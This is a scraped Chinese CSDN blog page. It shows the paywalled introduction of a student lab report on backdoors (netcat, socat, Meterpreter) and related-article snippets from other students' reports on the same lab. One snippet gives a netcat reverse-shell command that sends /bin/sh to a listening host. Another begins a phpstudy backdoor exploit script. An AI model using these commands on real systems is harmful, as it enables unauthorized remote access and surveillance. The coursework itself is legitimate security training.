Exp2-后门原理与实践

最新推荐文章于 2023-05-14 20:04:05 发布
最新推荐文章于 2023-05-14 20:04:05 发布
阅读量586 收藏 3
点赞数
分类专栏: exp 文章标签: linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/showmaker999/article/details/130214131
版权
本文详细介绍了后门的基本概念、常用工具如netcat和socat的使用,以及如何通过Meterpreter生成和利用后门获取主机Shell。实验涵盖了Windows与Linux之间的交互,包括利用cron和任务计划启动后门,以及获取目标主机的音频、摄像头和击键记录等敏感信息。此外,还讨论了如何检查和防止后门的安装。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

Exp2-后门原理与实践

目录

1 实验基础... - 1 -

1.1 基础知识... - 1 -

1.1.1 后门的概念... - 1 -

1.2常用后门工具... - 1 -

2.实验目标... - 2 -

3. 实践过程记录... - 2 -

3.0  环境准备... - 2 -

3.1  使用netcat获取主机操作Shell,cron启动... - 5 -

3.1.1 Windows获取Linux Shell - 5 -

3.1.2 Linux获取Windows Shell - 6 -

3.2  使用socat获取主机操作Shell, 任务计划启动... - 7 -

3.2.1 Windows获取Linux Shell - 7 -

3.2.2 Linux获取Windows Shell - 9 -

3.3  使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell - 13 -

3.4  使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权。... - 17 -

3.4.2 获取摄像头图片... - 19 -

3.4.3获取击键记录... - 21 -

3.4.4获取主机屏幕图像... - 21 -

4基础问题回答... - 23 -

5遇到的问题及解决... - 23 -

6实践总结与体会... - 25 -

1 实验基础

1.1 基础知识

1.1.1 后门的概念

后门就是不经过正常认证流程而访问系统的通道。后门可能出现在编译器中、操作系统中,最常见的是应用程序中的后门,还可能是潜伏于操作系统中或伪装成特定应用的专用后门程序。

1.2常用后门工具

NC和Netcat

底层工具,进行基本的TCP、UDP数据收发,常常被与其他工具结合使用,起到后门的作用。

在Linux系统中一般自带netcat,使用man nc命令可以查看使用帮助。

在Windows系统中,需要下载ncat.rar,解压后可使用。

SoCat

相当于Netcat++,一个超级Netcat工具。

在Windows下可以下载socat.rar,使用README作为参考。

任何代理、转发等功能都可以用该工具实现。

Meterpreter

一个用来生成后门程序的程序。

它包含着后门的

基本功能(基本的连接、执行指令)

扩展功能(如搜集用户信息、安装服务等功能)

编码模式

运行平台

运行参数

它把后门的内容全部做成零件或可调整的参数,按需组合使用形成需要的可执行文件。

常见的Meterpreter程序有:

intersect

Metaspolit的msfvenom指令

最低0.47元/天 解锁文章
无涯教程-exp2(x)函数
无涯教程
05-28 575
该函数计算给定数字的以2为底的指数函数。exp2x2x。
20194311姜晨昊Exp2-后门原理实践
weixin_51927594的博客
03-28 1454
20194311姜晨昊Exp2-后门原理实践 实验基础 本次实验需要我们掌握后门的基础知识,学习使用nc实现Windows,Linux之间的后门连接,学习使用Metaspolit的msfvenom指令生成简单的后门程序,学会MSF POST模块的应用。 基础知识 后门的概念 后门就是不经过正常认证流程而访问系统的通道。后门可能出现在编译器中、操作系统中,最常见的是应用程序中的后门,还可能是潜伏于操作系统中或伪装成特定应用的专用后门程序。 常用后门工具 NC和Netcat 底层工具,进行基本的
c语言exp2是什么函数,C ++ STL中的exp2()函数
weixin_30456153的博客
05-20 5087
在本文中,我们将讨论C ++ STL中用于复数的std::exp2()函数的工作,语法和示例。什么是std::exp2()?用于复数的std::exp2()函数是C ++ STL中的内置函数,该函数在或头文件中定义。exp2()函数用于计算二进制指数函数,该二进制指数函数是给定数字的以2为底的指数函数。此函数返回double,float或long double值(即)。语法exp2(double...
去了解一下区块链
苦作舟的空城机
02-18 634
区块链由一个一个区块组成,通过chain来将一个个block区块链接起来 人们可以把区块链看成人人都可以信任的分布式账簿 区块block 一个区块大体上面可以被分为三个部分: 数据 哈希值 --- 区块的哈希(hash)相当于人类的指纹 前区块哈希值 --- 除了自己区块的哈希值,还会存储之前区块的哈希值 一旦数据被更改,那么哈希值就会发生变化,这样人们就能通过哈希值...
2018-2019-2 20165312《网络攻防技术》Exp2 后门原理实践
weixin_30734435的博客
03-24 255
2018-2019-2 20165312《网络攻防技术》Exp2 后门原理实践 课上知识点梳理总结 1.后门的概述 后门是指不经过正常认证流程而访问系统的通道 两个关键词:未认证、隐通道 后门执行的过程:后门程序(.exe)->投送到系统中->启动->隐藏 2.NC或netcat 进行基本的TCP、UDP数据收发 linux下自带ncat,man ncat可以查看用法 w...
exp-2
qq_40706371的博客
01-21 267
浮点数的输出 float采用%f占位符。double采用%lf占位符。
20192209 Exp2-后门原理实践
LIULIULOO的博客
04-01 843
20192209 Exp2-后门原理实践 学习内容:使用nc实现win,mac,Linux间的后门连接 :meterpreter的应用 :MSF POST 模块的应用 学习目标:建立一个后门连接是如此的简单,功能又如此强大。通过亲手实践并了解这一事实,从而提高自己的安全意识 。 最后编辑:20180221 Wildlinux 1.后门概念 后门就是不经过正常认证流程而访问系统的通道。 哪里有后门呢? 编译器留后门 操作系统留后门 最常见的当然还是应用程序中留后门 还有就是潜伏于操作系统..
Exp2 后门原理实践 20204308李文艳
m0_61155000的博客
03-23 656
在做实验过程中出现了许多小问题,在之后的问题排除过程中可以发现近80%的问题是由于小细节,比如单词拼写错误,缺少空格等,这些问题只要再细心一些就可以避免。
20194307肖江宇Exp2后门原理实践
MYRLY的博客
03-28 3979
文章目录20194307肖江宇Exp-2后门原理实践1.实验基础1.1基础知识1.2常用后门工具NC和NetcatSoCat任何代理、转发等功能都可以用该工具实现。Meterpreter2.实验目标2.1实验环境3.实验过程3.1使用netcat获取主机操作Shell,cron启动**(1)在主机中获取虚拟机shell****(2)在虚拟机中获取主机shell****(3)在虚拟机中cron启动并在主机监听**3.2使用socat获取主机操作Shell,任务计划启动(1)在Windows获得Linux S
python编写工具番外篇(4)-- 编写一个phpstudy后门脚本的POCEXP
划水的小白白
04-23 468
文章目录1.前言2.POC2.1代码如下:2.2使用方法:3.EXP3.1代码如下:3.2使用方法: 1.前言 最近发现还是有部分网站存在着phpstudy后门的。 直接给出pocexp2.POC 2.1代码如下: import requests import base64 import re shell = "printf(md5('mss'));" shell_base64 = base64.b64encode(shell.encode('utf-8')) url = "http://127.0
操作符详解(二)
kqs__的博客
05-14 283
表达式的整型运算要在CPU的相应运算器件内执行,CPU内整型运算器(ALU)的操作数的字节长度一般就是int的字节长度,同时也是CPU的通用寄存器的长度。如果某个操作符的各个操作数属于不同的类型,那么除非其中一个操作数的转换为另一个操作数的类型,否则操作就无法进行。如果某个操作数的类型在上面这个列表中排名较低,那么首先要转换为另外一个操作数的类型后执行运算。因此,即使两个char类型的相加,在CPU执行时实际上也要先转换为CPU内整型操作数的标准长。C的整型算术运算总是至少以缺省整型类型的精度来进行的。
计算机计算exp函数原理,exp函数表示什么意思(exp怎么按计算器)
热门推荐
weixin_34569317的博客
07-21 2万+
目的:用于Exp(2)是e的平方,指数函数是数学中的一个重要函数。应用于值e的函数写成扩展数据:作为实变量x的函数,y=e的x次方的像总是正的(x轴以上)且递增的(从左到右)。它从不接触x轴,虽然它可以无限靠近x轴(因此,x轴是这个图像的水平渐近线。它的反函数是自然对数ln(x),定义在所有正数x上参考:百度百科- exp。二、EXP是什么功能 Exp,高等数学中基于自然常数e的指数函数。用途:表...
网络对抗技术-Exp2-后门原理实践 20181314
weixin_46014245的博客
03-15 482
一、实验内容 1.使用netcat获取主机操作Shell,cron启动 Windows获得Linux Shell 在Windows下使用ipconfig查看本机IP win+r 输入cmd,打开监听 nc -l -p 1314 在kali中反弹连接Windows,nc 172.16.214.132 -e /bin/sh,使用-e选项执行shell程序 Windows成功获得kali的shell,利用ls,whoami指令查看相关信息 Linux获得Windows Shell 在kali中使用ifconfi
Exp2 后门原理实践 20164320 王浩
weixin_34080571的博客
03-24 325
一、实践基本内容 1.实践目标 (1)使用netcat获取主机操作Shell,cron启动 (2)使用socat获取主机操作Shell, 任务计划启动 (3)使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell (4)使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝...
Exp2 后门原理实践
weixin_30838921的博客
03-25 582
Exp2 后门原理实践 实验环境 攻击机 kali 4.14(64位) (IP: 10.0.2.6/24) 靶机 ubuntu 16.04(32位) (IP: 10.0.2.4/24) windows 7 sp1(64位) (IP: 10.0.2.7/24) nc/ncat的使用 nc(全称是netcat)是一个用于TCP/UDP连接和监听的linux工具,有着网络工具中的“瑞士军刀”的...
Exp2 后门原理实践 20164309
a569847381的博客
03-22 459
准备工作: 使用 ipconfig 查看win7虚拟机IP地址为:192.168.236.130 使用 ipconfig 查看linux虚拟机IP地址为:192.168.236.131 实验内容 一、使用nc或netcat远程获取shell (1)win获得Linux shell 1.windows打开监听 进入文件夹 cd netcat ...
Exp2后门原理实践
03-29 254
一、简单后门 1、ncat、socat的基础操作 工具介绍: netcat(nc、ncat)是一个底层工具,进行基本的TCP UDP数据收发。常被其他工具结合使用,起到后门的作用。 socat:类似于Netcat的加强版。 以上两个工具均可以在老师课件主页的附件中下载++https://gitee.com/wildlinux/NetSec/attach_files++ Meterpre...
2018-2019 Exp2 后门原理实践
weixin_34087301的博客
03-20 187
2018-2019 Exp2 后门原理实践 目录 一、实验内容说明及基础问题回答 二、工具准备 查看WindowsIP和LinuxIP Windows获得Linuxshell Linux 获得Windows shell 使用nc传输数据 三、实验过程 使用netcat获取主机操作Shell,cron启动 使用socat获取主机操作Shell, 任务计划启动 使用MSF mete...
mysql语句中的sum(if(exp1,exp2,exp3))
wuhuagu_wuhuaguo的博客
10-27 4082
MYSQL 手册中MYSQL 函数 if() 的使用 if(expr1,expr2,expr3)  如果 expr1 是TRUE ,则if()的返回值为expr2; 否则返回值则为 expr3。if() 的返回值为数字值或字符串值,具体情况视其所在语境而定。 select sum(if(money > 0, money, 0)) as total_money from product g
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

showmaker999

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值